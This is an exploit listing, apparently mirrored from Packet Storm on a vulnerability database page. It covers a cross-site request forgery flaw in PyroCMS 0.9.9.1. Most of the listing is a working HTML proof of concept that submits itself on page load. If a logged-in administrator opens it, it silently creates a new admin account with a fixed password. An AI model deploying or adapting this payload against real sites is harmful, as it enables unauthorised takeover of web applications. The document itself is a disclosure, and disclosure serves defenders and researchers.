Lucene search
K

PyroCMS 0.9.9.1 Cross Site Request Forgery

🗓️ 13 Jul 2010 00:00:00Reported by AutoSec ToolsType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

PyroCMS 0.9.9.1 is vulnerable to cross-site request forgery, allowing admin creation exploit.

Code
`<!------------------------------------------------------------------------  
# Software................PyroCMS 0.9.9.1  
# Vulnerability...........Cross-site Request Forgery  
# Download................http://pyrocms.com/  
# Release Date............7/11/2010  
# Tested On...............Windows Vista + XAMPP  
# ------------------------------------------------------------------------  
# Author..................John Leitch  
# Site....................http://cross-site-scripting.blogspot.com/  
# [email protected]  
# ------------------------------------------------------------------------  
#   
# --Description--  
#   
# A cross-site request forgery vulnerability in PyroCMS 0.9.9.1 can be  
# exploited to create a new admin.  
#   
#   
# --PoC-->  
  
<html>  
<body onload="document.forms[0].submit()">  
<form method="POST" action="http://localhost/pyrocms/index.php/admin/users/create">  
<input type="hidden" name="first_name" value="a" />  
<input type="hidden" name="last_name" value="a" />  
<input type="hidden" name="email" value="[email protected]" />  
<input type="hidden" name="username" value="new_admin" />  
<input type="hidden" name="display_name" value="a" />  
<input type="hidden" name="group" value="admin" />  
<input type="hidden" name="active" value="1" />  
<input type="hidden" name="password" value="Password1" />  
<input type="hidden" name="confirm_password" value="Password1" />  
<input type="hidden" name="btnAction" value="save" />  
</form>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation